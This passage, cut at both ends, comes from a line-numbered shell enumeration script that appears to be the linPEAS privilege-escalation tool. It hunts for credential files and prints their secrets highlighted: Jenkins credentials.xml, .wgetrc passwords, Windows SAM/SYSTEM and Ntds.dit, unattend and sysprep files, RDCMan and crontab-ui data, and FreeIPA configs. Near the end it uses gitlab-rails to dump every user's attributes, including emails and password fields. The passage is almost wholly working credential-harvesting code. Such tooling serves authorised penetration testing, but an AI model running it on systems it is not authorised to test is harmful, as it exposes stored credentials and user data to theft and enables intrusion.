-${E} "s,hudson\.util\.Secret$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10825 if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"credentials\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "credentials\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|password.*|token.*|SecretKey.*|credentialId.*,${SED_RED},g"; done; echo ""; 10826 if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"config\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "config\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*|token.*|SecretKey.*|credentialId.*" | sed -${E} "s,secret.*|password.*|token.*|SecretKey.*|credentialId.*,${SED_RED},g"; done; echo ""; 10827 if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"jenkins$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*jenkins"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "jenkins$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,jenkins$,${SED_RED},"; find "$f" -name "build.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,build.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo "";done; echo ""; 10828 fi 10829 10830 10831 if [ "$PSTORAGE_WGET" ] || [ "$DEBUG" ]; then 10832 print_2title "Analyzing Wget Files (limit 70)" 10833 if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; 10834 fi 10835 10836 10837 if [ "$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then 10838 print_2title "Analyzing Interesting logs Files (limit 70)" 10839 if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; 10840 if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "error.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; 10841 fi 10842 10843 10844 if [ "$PSTORAGE_OTHER_INTERESTING" ] || [ "$DEBUG" ]; then 10845 print_2title "Analyzing Other Interesting Files (limit 70)" 10846 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bashrc"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; 10847 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.google_authenticator$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; 10848 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"hosts\.equiv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; 10849 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.lesshst$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; 10850 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.plan$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.plan$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; 10851 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".profile"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.profile$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; 10852 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.recently-used\.xbel$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; 10853 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".rhosts"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; 10854 if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; 10855 fi 10856 10857 10858 if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then 10859 print_2title "Analyzing Windows Files (limit 70)" 10860 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "\.rdg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; 10861 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; 10862 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"autounattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autounattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "autounattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autounattend\.xml$,${SED_RED},"; done; echo ""; 10863 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; 10864 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; 10865 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; 10866 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; 10867 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; 10868 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,credentialsProfiles|password|encryptedPassword,${SED_RED},g"; done; echo ""; 10869 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SAM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; 10870 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; 10871 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; 10872 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; 10873 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; 10874 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; 10875 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "default\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; 10876 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; 10877 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; 10878 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; 10879 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; 10880 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; 10881 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"index\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "index\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; 10882 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; 10883 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; 10884 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ntuser\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; 10885 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"pagefile\.sys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; 10886 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"printers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; 10887 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; 10888 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scclient\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; 10889 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; 10890 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"security\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "security\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; 10891 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "server\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; 10892 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; 10893 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; 10894 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; 10895 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; 10896 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,software$,${SED_RED},"; done; echo ""; 10897 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; 10898 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; 10899 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; 10900 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "system\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; 10901 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; 10902 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; 10903 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; 10904 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; 10905 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; 10906 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; 10907 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; 10908 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; 10909 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; 10910 if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"plum\.sqlite$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "plum.sqlite"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "plum\.sqlite$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,plum\.sqlite$,${SED_RED},"; done; echo ""; 10911 fi 10912 10913 10914 if [ "$PSTORAGE_CRONTAB_UI" ] || [ "$DEBUG" ]; then 10915 print_2title "Analyzing Crontab-UI Files (limit 70)" 10916 if ! [ "`echo \"$PSTORAGE_CRONTAB_UI\" | grep -E \"crontab\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "crontab.db"; fi; fi; printf "%s" "$PSTORAGE_CRONTAB_UI" | grep -E "crontab\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,crontab\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "-P[[:space:]]+\S+|--password[[:space:]]+\S+|[Pp]ass(word)?|[Tt]oken|[Ss]ecret" | sed -${E} "s,-P[[:space:]]+\S+|--password[[:space:]]+\S+|[Pp]ass(word)?|[Tt]oken|[Ss]ecret,${SED_RED},g"; done; echo ""; 10917 if ! [ "`echo \"$PSTORAGE_CRONTAB_UI\" | grep -E \"crontab-ui\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "crontab-ui.service"; fi; fi; printf "%s" "$PSTORAGE_CRONTAB_UI" | grep -E "crontab-ui\.service$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,crontab-ui\.service$,${SED_RED},"; done; echo ""; 10918 fi 10919 10920 10921 10922 10923 fi 10924 10925 if check_mitre_filter "T1552.001"; then 10926 if [ "$PSTORAGE_FREEIPA" ] || [ "$DEBUG" ]; then 10927 print_2title "Analyzing FreeIPA Files (limit 70)" 10928 ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.wiki/en/linux-hardening/freeipa-pentesting.html"; fi 10929 if ! [ "`echo \"$PSTORAGE_FREEIPA\" | grep -E \"ipa$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipa"; fi; fi; printf "%s" "$PSTORAGE_FREEIPA" | grep -E "ipa$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipa$,${SED_RED},"; find "$f" -name "default.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,default.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo "";done; echo ""; 10930 if ! [ "`echo \"$PSTORAGE_FREEIPA\" | grep -E \"dirsrv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "dirsrv"; fi; fi; printf "%s" "$PSTORAGE_FREEIPA" | grep -E "dirsrv$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,dirsrv$,${SED_RED},"; find "$f" -name "id2rntry.db" | while read ff; do ls -ld "$ff" | sed -${E} "s,id2rntry.db,${SED_RED},"; done; echo "";done; echo ""; 10931 fi 10932 10933 10934 fi 10935 10936 if check_mitre_filter "T1552.001"; then 10937 if [ "$(command -v gitlab-rails || echo -n '')" ] || [ "$(command -v gitlab-backup || echo -n '')" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then 10938 print_2title "Searching GitLab related files" "T1552.001" 10939 #Check gitlab-rails 10940 if [ "$(command -v gitlab-rails || echo -n '')" ]; then 10941 echo "gitlab-rails was found. Trying to dump users..." 10942 gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," 10943 echo "If you have enough privileges, you can make an 